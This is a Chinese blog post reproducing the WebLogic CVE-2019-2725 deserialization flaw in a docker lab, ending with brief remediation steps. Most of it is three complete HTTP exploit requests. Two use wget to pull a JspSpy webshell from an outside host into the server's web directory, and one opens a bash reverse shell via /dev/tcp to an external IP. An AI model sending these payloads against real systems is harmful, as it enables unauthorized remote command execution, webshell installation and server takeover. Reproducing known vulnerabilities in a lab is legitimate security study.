Weblogic反序列化漏洞(CVE-2019-2725)

最新推荐文章于 2024-08-06 17:02:41 发布
最新推荐文章于 2024-08-06 17:02:41 发布
阅读量4.5k 收藏 14
点赞数 2
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36197704/article/details/113390503
版权

1.漏洞描述

        wls9-async等组件为WebLogic Server提供异步通讯服务,默认应用于WebLogic部分版本。由于该WAR包在反序列化处理输入信息时存在缺陷,攻击者通过发送精心构造的恶意 HTTP 请求,即可获得目标服务器的权限,在未授权的情况下远程执行命令。

2.影响版本

Weblogic 10.x

Weblogic 12.1.3

3.漏洞环境搭建

在docker中搭建weblogic环境,进入/vulhub/weblogic/CVE-2017-10271目录

docker-compose up -d

浏览器访问http://192.168.1.100:7001/_async/AsyncResponseService,看到下图,可能存在CVE-2019-2725漏洞

4.漏洞复现

根据网上公开漏洞,复现三种方式

方式一:让服务器下载JspSpy.jsp.txt并重命名为cheat.jsp

(1)POC

POST /_async/AsyncResponseService HTTP/1.1

Host: 192.168.1.100:7001

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9,en;q=0.8

Connection: close

Content-Length: 850

Accept-Encoding: gzip, deflate

SOAPAction:

Accept: */*

User-Agent: Apache-HttpClient/4.1.1 (java 1.5)

Connection: keep-alive

content-type: text/xml

cmd:whoami


<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing"

xmlns:asy="http://www.bea.com/async/AsyncResponseService">

<soapenv:Header>

<wsa:Action>xx</wsa:Action>

<wsa:RelatesTo>xx</wsa:RelatesTo>

<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">

<void class="java.lang.ProcessBuilder">

<array class="java.lang.String" length="3">

<void index="0">

<string>/bin/bash</string>

</void>

<void index="1">

<string>-c</string>

</void>

<void index="2">

<string>wget http://xx.xx.xx.116/JspSpy.jsp.txt -O servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/cheat.jsp

</string>

</void>

</array>

<void method="start"/></void>

</work:WorkContext>

</soapenv:Header>

<soapenv:Body>

<asy:onAsyncDelivery/>

</soapenv:Body></soapenv:Envelope>

(2)利用burp发送POC数据包,看到服务器返回202,表示执行成功

(3)访问http://192.168.1.100:7001/bea_wls_internal/cheat.jsp,文件下载成功

方式二:让服务器下载JspSpy.jsp.txt并重命名为cheat.jsp

(1)POC

POST /_async/AsyncResponseService HTTP/1.1

Host: 192.168.1.100:7001

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9,en;q=0.8

Connection: close

Content-Length: 857

Accept-Encoding: gzip, deflate

SOAPAction:

Accept: */*

User-Agent: Apache-HttpClient/4.1.1 (java 1.5)

Connection: keep-alive

content-type: text/xml

cmd:whoami


<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing"

xmlns:asy="http://www.bea.com/async/AsyncResponseService">

<soapenv:Header>

<wsa:Action>xx</wsa:Action>

<wsa:RelatesTo>xx</wsa:RelatesTo>

<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">

<void class="java.lang.ProcessBuilder">

<array class="java.lang.String" length="3">

<void index="0">

<string>/bin/bash</string>

</void>

<void index="1">

<string>-c</string>

</void>

<void index="2">

<string>wget http://xx.xx.xx.116/JspSpy.jsp.txt -O servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/cheat.jsp

</string>

</void>

</array>

<void method="start"/></void>

</work:WorkContext>

</soapenv:Header>

<soapenv:Body>

<asy:onAsyncDelivery/>

</soapenv:Body></soapenv:Envelope>

(2) 利用burp发送POC数据包,看到服务器返回202,表示执行成功

(3)访问http://192.168.1.100:7001/_async/cheat.jsp,文件下载成功

方式三:反弹shell

(1)POC

POST /_async/AsyncResponseService HTTP/1.1

Host: 192.168.1.100:7001

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9,en;q=0.8

Connection: close

Content-Length: 789

Accept-Encoding: gzip, deflate

SOAPAction:

Accept: */*

User-Agent: Apache-HttpClient/4.1.1 (java 1.5)

Connection: keep-alive

content-type: text/xml

cmd:whoami


<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing"

xmlns:asy="http://www.bea.com/async/AsyncResponseService">

<soapenv:Header>

<wsa:Action>xx</wsa:Action>

<wsa:RelatesTo>xx</wsa:RelatesTo>

<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">

<void class="java.lang.ProcessBuilder">

<array class="java.lang.String" length="3">

<void index="0">

<string>/bin/bash</string>

</void>

<void index="1">

<string>-c</string>

</void>

<void index="2">

<string>bash -i &gt;&amp; /dev/tcp/49.235.250.116/1919 0&gt;&amp;1

</string>

</void>

</array>

<void method="start"/></void>

</work:WorkContext>

</soapenv:Header>

<soapenv:Body>

<asy:onAsyncDelivery/>

</soapenv:Body></soapenv:Envelope>

(2) 利用burp发送POC数据包,看到服务器返回202,表示执行成功

(3)成功反弹shell

5.修复方案

(1)删除该war包并重启WebLogic服务;

(2)禁用bea_wls9_async_response组件等组件。

 

 

 

 

 

 

 

 

 

 

 

 

 

 

chaojixiaojingang
关注
  • 2
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
weblogic反序列化漏洞复现( CVE-2019-2725
千寻的博客
12-02 5036
文章目录漏洞名称漏洞编号漏洞描述影响版本漏洞存在复现第一步 访问控制台第二步 使用weblogicScan进行扫描,发现存在该漏洞漏洞复现一(poc)执行命令:上传webshell漏洞复现二下载地址漏洞检查命令执行上传哥斯特马,并进行连接哥斯特与msf联动免责声明 漏洞名称 weblogic反序列化远程命令执行漏洞 漏洞编号 CVE-2019-2725 漏洞描述 CVE-2019-2725是一个Oracle weblogic反序列化远程命令执行漏洞, 这个漏洞依旧是根据weblogic的xm
weblogic反序列化漏洞(绕过CVE-2019-2725)-检测POC .txt
06-27
weblogic反序列化漏洞(绕过CVE-2019-2725)-检测POC .网上几乎没有,请珍惜。
Weblogic反序列化远程代码执行漏洞CVE-2019-2725
weixin_41182861的博客
09-25 2278
漏洞简述 2019年4月17日,CNVD 发布《关于Oracle WebLogic wls9-async组件存在反序列化远程命令执行漏洞的安全公告》,公告指出部分版本WebLogic中默认包含的wls9_async_response包,为WebLogic Server提供异步通讯服务。由于该WAR包在反序列化处理输入信息时存在缺陷,攻击者可以发送精心构造的恶意 HTTP 请求,获得目标服务器的权限,在未授权的情况下远程执行命令。 漏洞编号:CVE-2019-2725 影响版本:10.3.6.0、
weblogic_CVE-2019-2725
Longwaer
01-16 1465
通过笔记学习Weblogic漏洞原理,快速掌握复现技巧。
WebLogic CVE-2019-2725补丁.zip
07-16
weblogic反序列化补丁包
CVE-2019-2725
XINO
02-13 1158
在学习内网过程中遇到了weblogic比较常见的漏洞,编号是cve-2019-2725,之前没有总结过,于是本篇文章给大家总结归纳一下该漏洞的利用方法与原理。简单分析了一下cve-2019-2725漏洞的原理以及攻击修复方法,因为之前没有总结所以特地写一个文章总结一下,如果对大家有帮助不妨一键三连支持一下。
weblogic反序列化漏洞 cve-2018-3245
weixin_34146986的博客
10-24 3560
weblogic反序列化漏洞 CVE-2018-3245 0x00 针对cve-2018-2893的修复 针对JRMP反序列化修复的方式依旧是增加黑名单:黑名单package:java.rmi.activation sun.rmi.server黑名单class:java.rmi.server.UnicastRemoteObject java.r...
weblogic反序列化CVE-2020-2555漏洞分析
weixin_45682070的博客
03-18 4663
前言 CVE-2020-2555主要源于在coherence.jar存在着用于gadget构造的类(反序列化构造类),并且利用weblogic默认存在的T3协议进行传输和解析进而导致weblogic服务器反序列化恶意代码最后执行攻击语句。 Oracle Coherence组件默认集成在Weblogic12c及以上版本中。 ...
Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查工具CVE-2017-10271
11-11
工具"Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查工具CVE-2017-10271"是针对这一特定漏洞的检测与防护解决方案。 首先,我们来理解什么是Java反序列化漏洞。在Java中,序列化是将对象的状态转化为...
CVE-2017-10271 Weblogic反序列化漏洞补丁(FMJJ)
01-09
然而,与所有软件一样,Weblogic也存在安全漏洞,其中CVE-2017-10271是一个著名的反序列化漏洞CVE-2017-10271漏洞源于Weblogic服务器中WLS-Windows-Autopatch组件处理特定类型输入的反序列化过程。这个组件是...
Weblogic:Weblogic CVE-2019-2725 CVE-2019-2729 Getshell命令执行
03-11
weblogic CVE-2019-2725 CVE-2019-2729 POC 执行命令并回显 usage: 单个目标 python3 weblogic_get_webshell.py http://url 批量目标,将批量url放入url_list.txt python3 weblogic_get_webshell.py all
cve-2019-2725修复使用到的p28710912_1036_Generic.zip
06-03
cve-2019-2725修复相关的补丁和jdk等 cve-2019-2725补丁安装过程中使用到的材料 仅用于学习,如果用于商业,产生版权纠纷,与本人无关。
cve-2019-2725修复相关的补丁p29694149_10360190115_Generic.zip
06-03
cve-2019-2725修复相关的补丁和jdk等 cve-2019-2725补丁安装过程中使用到的材料 仅用于学习,如果用于商业,产生版权纠纷,与本人无关。
Weblogic XML反序列化漏洞CVE-2017-10271
04-16
Weblogic XML反序列化漏洞CVE-2017-10271是Oracle WebLogic Server中的一个严重安全问题,该漏洞允许攻击者通过精心构造的XML输入来远程执行代码,从而对受影响的系统造成破坏。这个漏洞主要涉及到WebLogic Server在...
Weblogic wls9_async_response 反序列化远程命令执行漏洞CVE-2019-2725)复现
ditanji3425的博客
05-06 2017
一、 漏洞简介 漏洞编号和级别 CVE编号:CVE-2019-2725,危险级别:高危,CVSS分值:9.8。 CNVD 编号:CNVD-C-2019-48814,CNVD对该漏洞的综合评级为“高危”。 漏洞概述 2019年4月17日,国家信息安全漏洞共享平台(CNVD)收录了由中国民生银行股份有限公司报送的Oracle WebLogic wls9-async反序列化远...
weblogic 远程代码执行 (CVE-2019-2725)
YouthBelief的博客
11-03 2162
@[TOC](weblogic 远程代码执行 (CVE-2019-2725)) weblogic 远程代码执行 (CVE-2019-2725) 这个漏洞依旧是根据weblogic的xmldecoder反序列化漏洞,通过针对Oracle官网历年来的补丁构造payload来绕过。 0x01 漏洞描述 Oracle WebLogic Server是美国甲骨文(Oracle)公司的一款适用于云环境和传统环境的应用服务中间件,它提供了一个现代轻型开发平台,支持应用从开发到生产的整个生命周期管理,并简化了应用的部署和管
cve2019-2725复现
Ping_Pig的博客
11-19 2067
漏洞存在于异步通讯服务,可通过访问路径/_async/AsyncResponseService,判断不安全组件是否开启 docker搭建环境: docker pull ismaleiva90/weblogic12 docker run -d -p 49163:7001 -p 49164:7002 -p 49165:5556 ismaleiva90/weblogic12:latest ...
weblogic(CVE-2019-2725)漏洞复现
来到了学渣的博客
12-16 8999
最近打攻防演练的时候碰到了这个漏洞,趁热打个铁复现一下漏洞 这个漏洞对比shiro来说还是比较新鲜的,他是去年新出的一款漏洞,19年4月 受影响版本 Oracle WebLogic Server 10.* Oracle WebLogic Server 12.1.3 影响组件: bea_wls9_async_response.war wsat.war 漏洞存在的页面: /_async/AsyncResponseService poc如下 POST /_async/AsyncResponseServ
Weblogic漏洞CVE-2019-2725
最新发布
qq_68186313的博客
08-06 205
wls9-async等组件为WebLogic Server提供异步通讯服务,默认应用于WebLogici部分版本。由于该WAR包在反序列化处理输入信息时存在缺陷,攻击者通过发送精心构造的恶意HTTP请求,即可获得目标服务器的权限,在未授权的情况下远程执行命令。1、拼接访问_async/AsyncResponseService,出现页面,存在漏洞。2、在当前页面抓包,修改请求包写入shell。
Weblogic IIOP反序列化漏洞(CVE-2020-2551)
07-28
嗨!关于Weblogic IIOP反序列化漏洞CVE-2020-2551),以下是一些相关信息: CVE-2020-2551是Weblogic Server的一个严重漏洞,该漏洞允许攻击者通过发送特制的T3协议请求来执行任意代码。这个漏洞属于Java反序列化漏洞的一种。 该漏洞的影响版本包括Weblogic Server 10.3.6.0.0、12.1.3.0.0和12.2.1.3.0。攻击者可以利用该漏洞远程执行任意代码,可能导致服务器的完全控制。 Oracle已经发布了安全补丁来修复这个漏洞。建议受影响的用户尽快升级到修复版本,并确保及时应用所有安全补丁。 此外,还可以通过配置防火墙规则、限制网络访问和监控异常行为等方法来增强系统的安全性。 希望这些信息能对你有所帮助!如果还有其他问题,请继续提问。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值